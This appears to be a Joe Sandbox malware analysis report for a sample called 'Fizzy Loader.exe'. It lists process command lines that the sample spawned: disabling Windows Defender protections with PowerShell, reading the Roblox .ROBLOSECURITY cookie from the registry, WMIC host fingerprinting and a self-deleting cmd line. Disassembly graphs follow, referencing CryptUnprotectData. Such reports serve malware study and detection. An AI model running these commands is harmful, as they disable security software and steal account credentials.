                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:7
                                                                                                                                                          Start time:18:49:54
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:8
                                                                                                                                                          Start time:18:49:57
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                          Imagebase:0x7ff6ef0c0000
                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:9
                                                                                                                                                          Start time:18:50:01
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:10
                                                                                                                                                          Start time:18:50:01
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:18:50:04
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:18:50:04
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:14
                                                                                                                                                          Start time:18:50:12
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:15
                                                                                                                                                          Start time:18:50:12
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:16
                                                                                                                                                          Start time:18:50:27
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"wmic.exe" os get Caption
                                                                                                                                                          Imagebase:0x7ff61d3e0000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:17
                                                                                                                                                          Start time:18:50:27
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:18
                                                                                                                                                          Start time:18:50:28
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                          Imagebase:0x7ff61d3e0000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:19
                                                                                                                                                          Start time:18:50:28
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:20
                                                                                                                                                          Start time:18:50:28
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"wmic.exe" csproduct get uuid
                                                                                                                                                          Imagebase:0x7ff61d3e0000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:21
                                                                                                                                                          Start time:18:50:28
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:22
                                                                                                                                                          Start time:18:50:29
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:23
                                                                                                                                                          Start time:18:50:29
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:25
                                                                                                                                                          Start time:18:50:48
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"wmic" path win32_VideoController get name
                                                                                                                                                          Imagebase:0x7ff61d3e0000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:26
                                                                                                                                                          Start time:18:50:48
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:27
                                                                                                                                                          Start time:18:50:52
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause
                                                                                                                                                          Imagebase:0x7ff641e80000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:28
                                                                                                                                                          Start time:18:50:52
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:29
                                                                                                                                                          Start time:18:50:52
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\PING.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:ping localhost
                                                                                                                                                          Imagebase:0x7ff752ab0000
                                                                                                                                                          File size:22'528 bytes
                                                                                                                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Disassembly

                                                                                                                                                          Reset < >

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:15.1%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                            Signature Coverage:100%
                                                                                                                                                            Total number of Nodes:4
                                                                                                                                                            Total number of Limit Nodes:0
                                                                                                                                                            execution_graph 47936 7ff8491036ae 47937 7ff8491036ca 47936->47937 47938 7ff8491037c7 CryptUnprotectData 47937->47938 47939 7ff849103843 47938->47939

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00007FF849110168 Relevance: 5.6, Strings: 4, Instructions: 583COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 428 7ff849110168-7ff8491102f0 444 7ff8491102f7-7ff849110303 call 7ff84910ef90 428->444 446 7ff849110308-7ff849110343 444->446 450 7ff849110369-7ff84911036f 446->450 451 7ff849110345-7ff849110351 446->451 452 7ff849110371-7ff84911037b 450->452 451->450 454 7ff849110353-7ff849110367 451->454 455 7ff849110385-7ff8491103a9 452->455 454->450 458 7ff8491103ab-7ff8491103b6 455->458 459 7ff8491103bc-7ff8491103f6 458->459 460 7ff849110593-7ff8491105a5 call 7ff8491106a4 458->460 468 7ff8491103f8 459->468 465 7ff8491105ab-7ff8491105c6 460->465 466 7ff849110690-7ff8491106a3 call 7ff8491106e4 460->466 476 7ff8491105c8-7ff8491105ca 465->476 477 7ff8491105cc-7ff8491105d3 465->477 472 7ff849110403-7ff84911040a 468->472 474 7ff84911040c-7ff84911040f 472->474 475 7ff849110411-7ff849110418 472->475 479 7ff849110442-7ff849110445 474->479 480 7ff84911041a-7ff849110420 475->480 481 7ff849110422-7ff849110428 475->481 478 7ff8491105fc-7ff8491105fe 476->478 482 7ff8491105dc-7ff8491105dd 477->482 483 7ff8491105d5-7ff8491105da 477->483 484 7ff849110628-7ff849110632 478->484 485 7ff849110600-7ff849110626 call 7ff84910efc8 478->485 487 7ff84911049d-7ff8491104b9 call 7ff84910efc8 479->487 488 7ff849110447-7ff84911049b 479->488 480->479 489 7ff84911042a 481->489 490 7ff84911042b-7ff84911043a 481->490 486 7ff8491105e0-7ff8491105e2 482->486 483->478 499 7ff849110634-7ff84911068f call 7ff84910ff08 484->499 485->499 491 7ff8491105e4 486->491 492 7ff8491105e5-7ff8491105f4 486->492 507 7ff8491104bb-7ff8491104d0 487->507 488->507 489->490 490->479 491->492 492->478 492->486 499->466 511 7ff8491104d2-7ff8491104d9 507->511 512 7ff8491104f7-7ff849110505 507->512 518 7ff8491104df-7ff8491104ed call 7ff84910f018 511->518 516 7ff84911053e-7ff84911056d 512->516 517 7ff849110507-7ff84911050f 512->517 521 7ff849110575-7ff849110580 516->521 531 7ff849110570 call 7ff84910ff08 516->531 520 7ff849110511-7ff849110518 call 7ff84910efd0 517->520 517->521 526 7ff8491104f2 518->526 520->521 532 7ff84911051a-7ff849110538 520->532 527 7ff849110582-7ff84911058d 521->527 526->521 527->459 527->460 531->521 532->516
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (H$0H$0H$8H
                                                                                                                                                            • API String ID: 0-3080014465
                                                                                                                                                            • Opcode ID: d1bd4c763b213f4121c7c332e27e6407caca0c17bfaca6963c73670ff3135ef6
                                                                                                                                                            • Instruction ID: ca504a8b140c7f620ff97b165b65c4cbc0f3fc0bb82d23e2fc884339b07df6b4
                                                                                                                                                            • Opcode Fuzzy Hash: d1bd4c763b213f4121c7c332e27e6407caca0c17bfaca6963c73670ff3135ef6
                                                                                                                                                            • Instruction Fuzzy Hash: 8702D431E1D9599FE7A8FF2C945A6B877E1FF98354F0401BAD04DC7292EE2CA8418B41
                                                                                                                                                            Function 00007FF849110150 Relevance: 5.5, Strings: 4, Instructions: 469COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 535 7ff849110150-7ff849110343 call 7ff84910ef90 559 7ff849110369-7ff8491103b6 535->559 560 7ff849110345-7ff849110351 535->560 568 7ff8491103bc-7ff84911040a 559->568 569 7ff849110593-7ff8491105a5 call 7ff8491106a4 559->569 560->559 563 7ff849110353-7ff849110367 560->563 563->559 583 7ff84911040c-7ff84911040f 568->583 584 7ff849110411-7ff849110418 568->584 574 7ff8491105ab-7ff8491105c6 569->574 575 7ff849110690-7ff8491106a3 call 7ff8491106e4 569->575 585 7ff8491105c8-7ff8491105ca 574->585 586 7ff8491105cc-7ff8491105d3 574->586 588 7ff849110442-7ff849110445 583->588 589 7ff84911041a-7ff849110420 584->589 590 7ff849110422-7ff849110428 584->590 587 7ff8491105fc-7ff8491105fe 585->587 591 7ff8491105dc-7ff8491105dd 586->591 592 7ff8491105d5-7ff8491105da 586->592 593 7ff849110628-7ff849110632 587->593 594 7ff849110600-7ff849110626 call 7ff84910efc8 587->594 596 7ff84911049d-7ff8491104b9 call 7ff84910efc8 588->596 597 7ff849110447-7ff84911049b 588->597 589->588 598 7ff84911042a 590->598 599 7ff84911042b-7ff84911043a 590->599 595 7ff8491105e0-7ff8491105e2 591->595 592->587 608 7ff849110634-7ff84911068f call 7ff84910ff08 593->608 594->608 600 7ff8491105e4 595->600 601 7ff8491105e5-7ff8491105f4 595->601 616 7ff8491104bb-7ff8491104d0 596->616 597->616 598->599 599->588 600->601 601->587 601->595 608->575 620 7ff8491104d2-7ff8491104ed call 7ff84910f018 616->620 621 7ff8491104f7-7ff849110505 616->621 635 7ff8491104f2 620->635 625 7ff84911053e-7ff84911056d 621->625 626 7ff849110507-7ff84911050f 621->626 630 7ff849110575-7ff84911058d 625->630 640 7ff849110570 call 7ff84910ff08 625->640 629 7ff849110511-7ff849110518 call 7ff84910efd0 626->629 626->630 629->630 641 7ff84911051a-7ff849110538 629->641 630->568 630->569 635->630 640->630 641->625
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (H$0H$0H$8H
                                                                                                                                                            • API String ID: 0-3080014465
                                                                                                                                                            • Opcode ID: 9ba2becd397036aa436a46448a73fc2526ed1b746548803eef7144b142f31a33
                                                                                                                                                            • Instruction ID: 341d3f003a9faae5ea7f9ac604ae3de4b1a44f1ee58039a5057a62fc66cd7895
                                                                                                                                                            • Opcode Fuzzy Hash: 9ba2becd397036aa436a46448a73fc2526ed1b746548803eef7144b142f31a33
                                                                                                                                                            • Instruction Fuzzy Hash: 22D1D331F1D9699FE7A4FB2CA8556F877E1FF88364F04017AD04DC7292DE28A8418B85
                                                                                                                                                            Function 00007FF849110188 Relevance: 5.4, Strings: 4, Instructions: 441COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 649 7ff849110188-7ff8491102f0 663 7ff8491102f7-7ff849110303 call 7ff84910ef90 649->663 665 7ff849110308-7ff849110343 663->665 669 7ff849110369-7ff84911036f 665->669 670 7ff849110345-7ff849110351 665->670 671 7ff849110371-7ff84911037b 669->671 670->669 673 7ff849110353-7ff849110367 670->673 674 7ff849110385-7ff8491103a9 671->674 673->669 677 7ff8491103ab-7ff8491103b6 674->677 678 7ff8491103bc-7ff8491103f6 677->678 679 7ff849110593-7ff8491105a5 call 7ff8491106a4 677->679 687 7ff8491103f8 678->687 684 7ff8491105ab-7ff8491105c6 679->684 685 7ff849110690-7ff8491106a3 call 7ff8491106e4 679->685 695 7ff8491105c8-7ff8491105ca 684->695 696 7ff8491105cc-7ff8491105d3 684->696 691 7ff849110403-7ff84911040a 687->691 693 7ff84911040c-7ff84911040f 691->693 694 7ff849110411-7ff849110418 691->694 698 7ff849110442-7ff849110445 693->698 699 7ff84911041a-7ff849110420 694->699 700 7ff849110422-7ff849110428 694->700 697 7ff8491105fc-7ff8491105fe 695->697 701 7ff8491105dc-7ff8491105dd 696->701 702 7ff8491105d5-7ff8491105da 696->702 703 7ff849110628-7ff849110632 697->703 704 7ff849110600-7ff849110626 call 7ff84910efc8 697->704 706 7ff84911049d-7ff8491104b9 call 7ff84910efc8 698->706 707 7ff849110447-7ff84911049b 698->707 699->698 708 7ff84911042a 700->708 709 7ff84911042b-7ff84911043a 700->709 705 7ff8491105e0-7ff8491105e2 701->705 702->697 718 7ff849110634-7ff84911068f call 7ff84910ff08 703->718 704->718 710 7ff8491105e4 705->710 711 7ff8491105e5-7ff8491105f4 705->711 726 7ff8491104bb-7ff8491104d0 706->726 707->726 708->709 709->698 710->711 711->697 711->705 718->685 730 7ff8491104d2-7ff8491104d9 726->730 731 7ff8491104f7-7ff849110505 726->731 737 7ff8491104df-7ff8491104ed call 7ff84910f018 730->737 735 7ff84911053e-7ff84911056d 731->735 736 7ff849110507-7ff84911050f 731->736 740 7ff849110575-7ff849110580 735->740 750 7ff849110570 call 7ff84910ff08 735->750 739 7ff849110511-7ff849110518 call 7ff84910efd0 736->739 736->740 745 7ff8491104f2 737->745 739->740 751 7ff84911051a-7ff849110538 739->751 746 7ff849110582-7ff84911058d 740->746 745->740 746->678 746->679 750->740 751->735
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (H$0H$0H$8H
                                                                                                                                                            • API String ID: 0-3080014465
                                                                                                                                                            • Opcode ID: 7d7bec87e2100594f033bd17f50fe3edfaa7b98fa1fe61451c583969bd574ee7
                                                                                                                                                            • Instruction ID: 03a0e543cfffa1da9dd5af235c15a8408459d469adcc5b4fb37f796283a91354
                                                                                                                                                            • Opcode Fuzzy Hash: 7d7bec87e2100594f033bd17f50fe3edfaa7b98fa1fe61451c583969bd574ee7
                                                                                                                                                            • Instruction Fuzzy Hash: 4FC1C231F1C9599FE7A4EF2C985A6F977E1FF98350F0401BAD04DC7292DE28A8418B81
                                                                                                                                                            Function 00007FF849110190 Relevance: 5.4, Strings: 4, Instructions: 437COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 754 7ff849110190-7ff8491102f0 768 7ff8491102f7-7ff849110303 call 7ff84910ef90 754->768 770 7ff849110308-7ff849110343 768->770 774 7ff849110369-7ff84911036f 770->774 775 7ff849110345-7ff849110351 770->775 776 7ff849110371-7ff84911037b 774->776 775->774 778 7ff849110353-7ff849110367 775->778 779 7ff849110385-7ff8491103a9 776->779 778->774 782 7ff8491103ab-7ff8491103b6 779->782 783 7ff8491103bc-7ff8491103f6 782->783 784 7ff849110593-7ff8491105a5 call 7ff8491106a4 782->784 792 7ff8491103f8 783->792 789 7ff8491105ab-7ff8491105c6 784->789 790 7ff849110690-7ff8491106a3 call 7ff8491106e4 784->790 800 7ff8491105c8-7ff8491105ca 789->800 801 7ff8491105cc-7ff8491105d3 789->801 796 7ff849110403-7ff84911040a 792->796 798 7ff84911040c-7ff84911040f 796->798 799 7ff849110411-7ff849110418 796->799 803 7ff849110442-7ff849110445 798->803 804 7ff84911041a-7ff849110420 799->804 805 7ff849110422-7ff849110428 799->805 802 7ff8491105fc-7ff8491105fe 800->802 806 7ff8491105dc-7ff8491105dd 801->806 807 7ff8491105d5-7ff8491105da 801->807 808 7ff849110628-7ff849110632 802->808 809 7ff849110600-7ff849110626 call 7ff84910efc8 802->809 811 7ff84911049d-7ff8491104b9 call 7ff84910efc8 803->811 812 7ff849110447-7ff84911049b 803->812 804->803 813 7ff84911042a 805->813 814 7ff84911042b-7ff84911043a 805->814 810 7ff8491105e0-7ff8491105e2 806->810 807->802 823 7ff849110634-7ff84911068f call 7ff84910ff08 808->823 809->823 815 7ff8491105e4 810->815 816 7ff8491105e5-7ff8491105f4 810->816 831 7ff8491104bb-7ff8491104d0 811->831 812->831 813->814 814->803 815->816 816->802 816->810 823->790 835 7ff8491104d2-7ff8491104d9 831->835 836 7ff8491104f7-7ff849110505 831->836 842 7ff8491104df-7ff8491104ed call 7ff84910f018 835->842 840 7ff84911053e-7ff84911056d 836->840 841 7ff849110507-7ff84911050f 836->841 845 7ff849110575-7ff849110580 840->845 855 7ff849110570 call 7ff84910ff08 840->855 844 7ff849110511-7ff849110518 call 7ff84910efd0 841->844 841->845 850 7ff8491104f2 842->850 844->845 856 7ff84911051a-7ff849110538 844->856 851 7ff849110582-7ff84911058d 845->851 850->845 851->783 851->784 855->845 856->840
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (H$0H$0H$8H
                                                                                                                                                            • API String ID: 0-3080014465
                                                                                                                                                            • Opcode ID: a9189f649a9e4ab096c07d3d2deff4ee5abb4673ad4e54486356d69bc659de37
                                                                                                                                                            • Instruction ID: 84e096d377c70a60c15b15d9f4a90b4f9d3605f8986e30897a50dee0e4789797
